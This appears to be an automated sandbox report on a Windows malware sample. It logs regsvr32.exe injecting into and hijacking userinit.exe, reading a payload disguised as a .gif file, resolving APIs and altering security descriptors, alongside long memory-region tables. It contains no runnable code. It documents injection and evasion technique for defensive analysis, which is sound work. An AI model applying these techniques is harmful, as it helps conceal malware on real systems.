private_0x0000000002730000	0x02730000	0x027e4fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027e8fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027ecfff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027f0fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027f4fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027f8fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027fcfff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02800fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02804fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02808fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0280cfff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02812fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02816fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0281afff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0281efff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02824fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02828fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0282cfff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02832fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02836fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0283afff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0283ffff	Private Memory	-	-
private_0x0000000002810000	0x02810000	0x028e2fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028e6fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028eafff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028eefff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02904fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02908fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0290cfff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02910fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02926fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x0292afff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x0292efff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x02944fff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x02948fff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x0294cfff	Private Memory	rw	-
private_0x00000000028f0000	0x028f0000	0x029d0fff	Private Memory	rw	-
private_0x0000000002920000	0x02920000	0x02a12fff	Private Memory	rw	-
private_0x0000000002930000	0x02930000	0x02a30fff	Private Memory	rw	-
private_0x0000000002950000	0x02950000	0x02a62fff	Private Memory	rwx	-
private_0x0000000002a70000	0x02a70000	0x02b6ffff	Private Memory	-	-
private_0x0000000002b70000	0x02b70000	0x02baffff	Private Memory	rw	-
private_0x0000000002cf0000	0x02cf0000	0x02deffff	Private Memory	rw	-
sortdefault.nls	0x02df0000	0x030befff	Memory Mapped File	r	-
olepro32.dll	0x6d790000	0x6d7a8fff	Memory Mapped File	rwx	-
comctl32.dll	0x6d7b0000	0x6d833fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd6000	0x7ffd6000	0x7ffd6fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 20 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffd6008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0x3d8, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d790000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d7b0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = \ð , size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d7e266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d7e2542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d7e1d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d7e238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7e20c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d7e1fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d7e1e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d7e1f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d7e1ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d7e216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7e22be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7e21e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d7920ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d7920b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d7920c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d7920d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 856047	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #47: userinit.exe

222

0

»

Information	Value
ID	#47
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:02:58, Reason: Child Process
Unmonitor	End Time: 00:03:01, Reason: Self Terminated
Monitor Duration	00:00:03

OS Process Information

»

Information	Value
PID	0x1c0
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 414 0x 248 0x 35C

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x0006ffff	Private Memory	rw	-
pagefile_0x0000000000070000	0x00070000	0x00073fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000080000	0x00080000	0x00080fff	Pagefile Backed Memory	r	-
locale.nls	0x00090000	0x000f6fff	Memory Mapped File	r	-
pagefile_0x0000000000100000	0x00100000	0x001c7fff	Pagefile Backed Memory	r	-
private_0x00000000001d0000	0x001d0000	0x001d0fff	Private Memory	rw	-
private_0x00000000001e0000	0x001e0000	0x002dffff	Private Memory	rw	-
pagefile_0x00000000002e0000	0x002e0000	0x003e0fff	Pagefile Backed Memory	r	-
private_0x00000000003f0000	0x003f0000	0x003f0fff	Private Memory	rwx	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
private_0x0000000000470000	0x00470000	0x004bffff	Private Memory	rw	-
pagefile_0x0000000000470000	0x00470000	0x00476fff	Pagefile Backed Memory	r	-
private_0x0000000000480000	0x00480000	0x004bffff	Private Memory	rw	-
pagefile_0x00000000004c0000	0x004c0000	0x004c1fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x004d0000	0x004d0fff	Memory Mapped File	r	-
private_0x00000000004e0000	0x004e0000	0x004e0fff	Private Memory	rwx	-
pagefile_0x00000000004f0000	0x004f0000	0x004f1fff	Pagefile Backed Memory	r	-
private_0x0000000000510000	0x00510000	0x0051ffff	Private Memory	rw	-
private_0x0000000000520000	0x00520000	0x0061ffff	Private Memory	-	-
private_0x0000000000640000	0x00640000	0x0064ffff	Private Memory	rw	-
private_0x0000000000650000	0x00650000	0x006cffff	Private Memory	rw	-
userinit.exe	0x006f0000	0x006f8fff	Memory Mapped File	rwx	-
pagefile_0x0000000000700000	0x00700000	0x012fffff	Pagefile Backed Memory	r	-
private_0x0000000001300000	0x01300000	0x0146ffff	Private Memory	rw	-
pagefile_0x0000000001300000	0x01300000	0x013defff	Pagefile Backed Memory	r	-
private_0x00000000013e0000	0x013e0000	0x0141ffff	Private Memory	rw	-
private_0x0000000001430000	0x01430000	0x0146ffff	Private Memory	rw	-
staticcache.dat	0x01470000	0x01d9ffff	Memory Mapped File	r	-
pagefile_0x0000000001da0000	0x01da0000	0x02192fff	Pagefile Backed Memory	r	-
private_0x00000000021a0000	0x021a0000	0x022acfff	Private Memory	rw	-
private_0x00000000022b0000	0x022b0000	0x023affff	Private Memory	rw	-
private_0x00000000023b0000	0x023b0000	0x025affff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x02630fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x02634fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x02638fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x0263cfff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x02642fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x02646fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x0264afff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x0264efff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x02654fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x02658fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x0265cfff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x02662fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x02666fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x0266afff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x0266efff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x02674fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x02678fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x0267cfff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x02682fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x02686fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x0268afff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x0268efff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x02694fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x02698fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x0269cfff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x026a2fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x026a6fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x026aafff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x026aefff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x026b4fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x026b8fff	Private Memory	rw	-
private_0x00000000025b0000	0x025b0000	0x026bcfff	Private Memory	rw	-
private_0x0000000002640000	0x02640000	0x026c2fff	Private Memory	rw	-
private_0x0000000002640000	0x02640000	0x026c6fff	Private Memory	rw	-
private_0x0000000002640000	0x02640000	0x026cafff	Private Memory	rw	-
private_0x0000000002640000	0x02640000	0x026cefff	Private Memory	rw	-
private_0x0000000002650000	0x02650000	0x026e4fff	Private Memory	rw	-
private_0x0000000002650000	0x02650000	0x026e8fff	Private Memory	rw	-
private_0x0000000002650000	0x02650000	0x026ecfff	Private Memory	rw	-
private_0x0000000002650000	0x02650000	0x026f0fff	Private Memory	rw	-
private_0x0000000002660000	0x02660000	0x02706fff	Private Memory	rw	-
private_0x0000000002660000	0x02660000	0x0270afff	Private Memory	rw	-
private_0x0000000002660000	0x02660000	0x0270efff	Private Memory	rw	-
private_0x0000000002670000	0x02670000	0x02724fff	Private Memory	rw	-
private_0x0000000002670000	0x02670000	0x02728fff	Private Memory	rw	-
private_0x0000000002670000	0x02670000	0x0272cfff	Private Memory	rw	-
private_0x0000000002670000	0x02670000	0x02730fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02746fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0274afff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0274efff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02764fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02768fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0276cfff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02770fff	Private Memory	rw	-
private_0x00000000026a0000	0x026a0000	0x02786fff	Private Memory	rw	-
private_0x00000000026a0000	0x026a0000	0x0278afff	Private Memory	rw	-
private_0x00000000026a0000	0x026a0000	0x0278efff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027a4fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027a8fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027acfff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027b0fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027c6fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027cafff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027cffff	Private Memory	-	-
private_0x00000000026d0000	0x026d0000	0x02760fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027a2fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027c0fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x02802fff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x02820fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02862fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02880fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028c2fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028e2fff	Private Memory	rwx	-
private_0x00000000028f0000	0x028f0000	0x029effff	Private Memory	-	-
private_0x0000000002b70000	0x02b70000	0x02c6ffff	Private Memory	rw	-
sortdefault.nls	0x02c70000	0x02f3efff	Memory Mapped File	r	-
olepro32.dll	0x6d770000	0x6d788fff	Memory Mapped File	rwx	-
comctl32.dll	0x6d7b0000	0x6d833fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
